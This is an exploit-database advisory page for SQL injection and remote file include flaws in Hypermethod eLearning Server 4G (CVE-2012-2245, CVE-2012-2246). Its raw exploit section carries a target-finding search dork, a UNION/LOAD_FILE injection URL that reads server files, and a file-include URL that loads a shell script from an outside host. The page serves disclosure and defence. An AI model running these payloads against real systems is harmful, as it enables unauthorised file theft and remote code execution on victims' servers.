header-logo
Suggest Exploit
vendor:
eLearning Server
by:
Eugene Salov, Andrey Komarov
7,5
CVSS
HIGH
SQL Injection, Remote File Include
89, 98
CWE
Product Name: eLearning Server
Affected Version From: 4G
Affected Version To: 4G
Patch Exists: YES
Related CWE: CVE-2012-2245, CVE-2012-2246
CPE: a:hypermethod:elearning_server
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Microsoft Windows
2012

eLearning Server Multiple Remote Vulnerabilities

The news.php4 script is vulnerable to SQL injection when the 'nid' parameter is supplied. An attacker can use this vulnerability to execute arbitrary SQL commands on the underlying database. The admin/setup.inc.php script is vulnerable to remote file include. An attacker can use this vulnerability to include a remote file containing malicious code and execute it on the vulnerable server.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Remote file include vulnerabilities should be prevented by restricting access to the vulnerable script.
Source

Exploit-DB raw data:

# Exploit Title: eLearning Server Multiple Remote Vulnerabilities
# Google Dork: intitle:"eLearning Server"
# Date: 10.05.2012
# Author: Eugene Salov, Andrey Komarov (Group-IB, http://group-ib.ru)
# Software Link: http://www.hypermethod.ru/
# Version: 4G
# Tested on: Microsoft Windows

news.php4 "nid" SQL injection:
POC:
/news.php4?nid=-12'+union+select+1,2,LOAD_FILE('C:\\Program%20Files\\Hypermethod\\eLearningServer\\index.php'),4,5,6,7,8,9,10,11/*

admin/setup.inc.php Remote file Include
POC: /admin/setup.inc.php?path=http://group-ib.ru/shell.txt?

Navigation

Suggest Exploit

Services By CQR